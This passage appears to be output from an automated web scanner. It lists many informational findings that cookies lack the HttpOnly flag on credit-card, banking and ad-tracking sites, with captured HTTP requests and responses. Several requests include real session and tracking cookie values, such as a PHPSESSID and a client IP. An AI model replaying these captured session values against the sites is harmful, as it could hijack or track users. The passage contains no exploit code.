Accept-Ranges: bytes
Last-Modified: Fri, 17 Jun 2011 12:02:28 GMT
Set-Cookie: HumanClickSiteContainerID_32528459=STANDALONE; path=/hc/32528459
Set-Cookie: LivePersonID=-16101514677756-1308311975:-1:1308311999:-1:-1; expires=Sat, 16-Jun-2012 12:02:28 GMT; path=/hc/32528459; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 28177

lpConnLib.Process({"ResultSet": {"lpCallId":"693976194597-483333286596","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.31. http://spotlight.creditcards.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 11:58:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=1&target=_blank&cb=70986151927&charset=UTF-8&loc=http%3A//blogs.creditcards.com/&referer=http%3A//www.creditcards.com/points-rewards.php HTTP/1.1
Host: spotlight.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; OAID=aaa441a9105b309385d19a81a43e09ae; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311932226%27%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:55 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 11:58:55 GMT; path=/
Content-Length: 1313
Content-Type: text/javascript; charset=UTF-8

var OX_aa3ed954 = '';
OX_aa3ed954 += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OX_aa3ed954 += "/* openads=http://spotlight.creditcards.com/www/delivery bannerid=26 zonei
...[SNIP]...

10.32. http://spotlight.creditcards.com/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 11:59:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=26&campaignid=3&zoneid=1&loc=1&referer=http%3A%2F%2Fblogs.creditcards.com%2F&cb=7899e1c4b9 HTTP/1.1
Host: spotlight.creditcards.com
Proxy-Connection: keep-alive
Referer: http://blogs.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cc=true; OAID=aaa441a9105b309385d19a81a43e09ae; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:02 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=aaa441a9105b309385d19a81a43e09ae; expires=Sat, 16-Jun-2012 11:59:03 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.33. http://tags.bluekai.com/site/2750 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2750

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=gUoquR7lj5Zd8JkA; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
bkc=KJh5Naa/DtWDOdedqPFmkjBYYo31/emZ+QGCuYsH7QptmBZexyhEiUhDJ96PbzDxVosYuetWFQiZfvAKOGN9KryoYFJaWTDCpkYZGIizKdKNKXfefFMh7UmIzIf2fL6W9cXVKB+HMJ6YAYswJSVfFsVw7QcI7gSycils9Ci6lEX1TRSq6Cckoo96Nl4q9IZNoX9JtRwc+o5YpFTKJs6Fvr5c/Jhf/Otb3BqcSSftRLy3pHKk4+INXqyP3YjFcysoBZK54q2jZFLl8Fy625BhydsTe0QA3WS6fsbF5J4n24ufudmKlpZmHHelLELejjXWQKHlYpUAEF0yt97km1Vfp4VBrPbXPmXSzFjIFsbXV6UgihRvKXz642MtCtA/zfhhkooI4y7/Agkd2GG0hhLF62foBO9ImvEXEJe5IA0STTldP9ON4zY2C6TIITG0hhFfvwdn1FYPXG6dvTX+ue2u7o0UUoiEl7G+F4NvI340BIUSk2n7kvrDFz3MvKZCsK7Xkwu+sZZIUXSg8wPw21bbwv2XrDbSXT6MjTcoqQr84BAe/KAIjzTlf3cnZI498FbCdUlovj6URlXkLWc7GlcwiV5weA+wvcmIXuh2E/Jqaoo35dXfGcy2nwtqpo4qOXo88uz+67fkyClo4KP4037q6iIDKEfMu7GKcIkXU7Y8563b4DvSdTle2eT7gkgYrU38pFLjdyBzGlah; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
bkst=KJhBAn2gNWWxhqz/snyzWxxqHupuqopj74taCRxAcYjz8/CQDrfm4gIQy3kaevHmgfSoqnxPguVxd9DtRoku6NAJ6zqjLXkVy8Lwfft5m4Uk3oJlIF7fKWT50f0AQitIxWTbKhz6Jj56jYv5QtcsbGph85teFXv4Yc2afDt4EjdFEpILBKk6jCcfTM3qVDKqguqZgswBxR4K5Bxkf0Z0I5xiFNbtInwzncbJ5aNau+8jXeRjjTNpW4prbpBjny8STq4lspGKBBuuOlY9comhAuyipFdX/KFexu+e+D/GccVUx+s/AqV+cK+x/MrVY/Z8mdFdKIaF3+VP2KlNgDzwd5gM0Kgn6Dc54pc3K4H6LbTzpHG1adb7siO6CoyO3VACrL7184jx3xDPUdsEFz7sKs57Rd4sgUwHFTkIHbsJ+GHA9Y6Q91ikvyvnpnTl8/z4ZX48LeVF0Kzx351h9VGv+5moPo7bCJZnHR5WF0IWFl4+6C740slI9VrbKQA=; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.34. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=tjN2bLOLq2Sd8JkA; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bkc=KJh5NWa/asWDOded8sbgkCraani0OJ3hjPLHOYDD6AWvkATgKpYAv9FFugHvi7HHCnSGxvHnbWVGjW2NYJH9m7GvCqoAAgY/ShugRFEKEkXfdlKRsU8XfdIIqtSIZKyIT12KeyFJ7PxWN8WPlI6cIzxj5LvTBzqrYgsgyW8vd+Uk7PxP/MQQUF6B81uKNvZF7VBgwt4BEX4X2K8OH2kEhLUf/O5rLVBctc7JUpN5bEXfYsy74EX19bV1gecQfCYfvI9Vmu8Jd+YwgPxYbqYbLfqifuCyRXkeFqQE08TbR80VI3YNFfwtuddg5h0aX7ybfghVJIBEcAggVlJdXqn4MRvL2zfpLrQlezYXVBKF4ZtL2zTp17zIeXxl467IxNE52Gi+2zbfWSY8OfC0hXIgZT0NlMALIDXpyvnA7EXSe600KTtcJ2iEn2Qgp2igE2k4MeXqBp8Ccpur1yTjjlwLF7atzRH2+ob+pXF8gUCCEgfHQYK1MpSpBKIzt9I157LGaYrIatwlssFKISSzUGTOlpq644FVzK43srYgf/IEblb2Kgi4wVuLKK47XFm/g7CGqPpffNgMDlctE2k4xVXSaT64UsHUs8zrLeK1FhF7pg14sIF2m54/IlQFIdByyn5ctmNeqn6bhIPfpCpp0/DVc+487wXYrchQyy==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bko=KJ0ETtBQucUXfzF11/ZBQVsYdV24UGRZeQRsEdl4FAy1WfkCnsVQfcs2lfb1evK8Rvy5yC9VWT13nTxk0meBYhBECfnTsV/a/uhZCgwzWORnxpQf6af8U6OE5/YZdcMlWXQ3a/uTCRkOM8ZOTKv7gfbze9h91u6Qi8cCe+9XcjZUxnNhxC9VW61iP/0P/H2GcFmn86ONYEy1ecaw7Qa+6TvpnFaeVWeqKsWLuSewlyU49Lgv9kAOsbXeExR9WE2s4x==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bkw5=KJ0akaN/DtWRhddcGp7wp9pXiOjHARjpS6L7nis5hrRTtl9UxxVHtjj52xDa6RGIMmG09k5K5eP0xUxHCGH/WAH6sHEHgVWUxPaSHa4VX8plMw4xl+cQwsKzldmXpdzfNQq9PzHgKFUiSiKQ/K4tKRYLQ6HyluR5xVePu8I1/kRNGOkcRAp3MnZfxJKkPxedBnp+jPkMqngpnl77/WLIRviri1B6t7qXbQJ6mynCnK4tOkPSc1tEu8U/MWKgxcquSDd2/QmeUksXf8/j29VWeVz2Q/DKGWRHM49LFJHqknpTbqksjW/clmi6iqziTEwPCwtGuD4a60ocyBZLfUqtTbE5M8KwQ9XCIAxtw3oSmTbcojXqwRJyo+lTaoS7lU/xcfTbqsSJh/iX3uDa2mXVhB1v+/V8qkBGgyn3zzGW3ocUF8BsUF2+uPz4ud2ZeHttn7K0OK5/+TgbBUiapMu0W6YZMdNwTu4hHQxstW+KUhTcMM7/mr000x3HWyfuQYsqL1dEeg/KOtl0QtpmmWQE2+rWRffG/1t/tTEpKnhcNMmWMdt0SMzMywis/gJVep8cjB2KHsx2TpQ6vs6ZG20h9rSgr9R+vH7NukESZJiw0V7nh1uWzZyqX40dCm5xEUQmNRuM4CDEBXRpBfNyBiSM7C6VDlYqqnjC5aCmQu+mEdtDkDIl0qkBTye2UtBworiiSzG5YbcVPBXH8P3kqBuWLNWEpZRL/qvJDYQsPA686TLJzUL66VLF8Cn02+iUavzNfr9/Q6kN7mPSoEMPCmBDWTfpENnLOk4BMzDA0fpI053QXZtbRWZr35QY155i0dvbLzu0QKH/uZudHK58e3jAn21VvPiAsQccOe8AGANq1V3RE/ZbXJjKcCcHzdIl/oWV+0glwI4IzoEkX7ZVeppLjjgAw5rY+XSn6qubArPSoD330Rp08a/kfNrAR1NYvpvVppoeTfP0lePd9jrOJTD=; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.35. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bankofamerica.com
Path:	/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerngen-www.80=918992555.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 17 Jun 2011 12:25:20 GMT
Content-length: 24401
Content-type: text/css
Last-modified: Sat, 11 Dec 2010 00:36:35 GMT
Etag: "5f51-4d02c793"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=918992555.20480.0000; path=/

/* top level font to cascade */
.standard-font {font-size: 71%; font-family: Verdana,Arial,Geneva,Helvetica,sans-serif;}
.standard-font2 {font-size: 90%; font-family: Verdana,Arial,Geneva,Helvetica,sa
...[SNIP]...

10.36. http://www.capitalone.com/css/global/portal_base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_base.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=29FB6279666D0428; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.37. http://www.capitalone.com/css/global/portal_common.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_common.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=A0443C7AC9C03A80; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.38. http://www.capitalone.com/css/global/portal_grid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_grid.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=36A4741F4351C1C5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.39. http://www.capitalone.com/css/global/portal_print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_print.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=6BEC44E31BF1D852; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.40. http://www.capitalone.com/css/page-type/portal_landing-accordion.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_landing-accordion.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=3356A9F2A6EF7136; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.41. http://www.capitalone.com/css/page-type/portal_popup.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_popup.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=D266E53D0B03223F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.42. http://www.capitalone.com/css/page-type/portal_product.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_product.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=1B84F757B67B6884; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.43. http://www.capitalone.com/css/portal_footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_footer.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=18941BEAA04F3459; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.44. http://www.capitalone.com/css/portal_header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_header.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=FC628D4CC1E8D53; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.45. http://www.capitalone.com/css/portal_page-nav-heading.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/portal_page-nav-heading.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=336BE560308D6ECB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.46. http://www.capitalone.com/img/global/icon/lock.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/icon/lock.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=8EA70C0FA4A60600; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.47. http://www.capitalone.com/img/global/logo/ehl.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/ehl.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=E628BAC2937BAB66; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.48. http://www.capitalone.com/img/global/logo/fdic.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/fdic.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=34DF7D6482753A91; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.49. http://www.capitalone.com/img/global/logo/sprite/header.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/img/global/logo/sprite/header.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=416EE042D34F4E42; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.50. http://www.capitalone.com/js/component/portal_accordion.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_accordion.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=9A9F2B2775C2D986; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.51. http://www.capitalone.com/js/component/portal_open_account.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_open_account.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=54FB887DB689A0C6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.52. http://www.capitalone.com/js/component/portal_swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_swfobject.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=C10919DDE4849D4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.53. http://www.capitalone.com/js/component/portal_utilitynav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/component/portal_utilitynav.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=621B246FA5B61ECD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.54. http://www.capitalone.com/js/global/cof/portal_header.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/cof/portal_header.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=A664F526D8F83526; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.55. http://www.capitalone.com/js/global/cof/portal_headerFooter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/cof/portal_headerFooter.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=36F95AE8B71D2AB1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.56. http://www.capitalone.com/js/global/portal_cof.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_cof.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=82B666A5B70ED0B6; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.57. http://www.capitalone.com/js/global/portal_footnote.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_footnote.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=CAAEBF3CF4187A6F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.58. http://www.capitalone.com/js/global/portal_global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/global/portal_global.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=D36C8BEC5661A873; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.59. http://www.capitalone.com/js/liveperson/LivePerson_USC_VS.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/liveperson/LivePerson_USC_VS.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=3750237ABB1E26AD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.60. http://www.capitalone.com/js/liveperson/mtagconfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/liveperson/mtagconfig.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=F027C4BD465C43C; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.61. http://www.capitalone.com/js/onlineopinionF3cS/oo_conf_en-US.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/onlineopinionF3cS/oo_conf_en-US.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=E65A92900568B78D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.62. http://www.capitalone.com/js/onlineopinionF3cS/oo_engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/onlineopinionF3cS/oo_engine.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=7EAFCCE87BE48675; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.63. http://www.capitalone.com/js/questus/config.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/questus/config.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=B2643B616AC9A640; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.64. http://www.capitalone.com/js/questus/intercept.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/js/questus/intercept.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=B833A23EE35CDFDA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.65. http://www.capitalone.com/media/graphic_logo/global/button/action-oversized-apply-now.png previous next

Summary

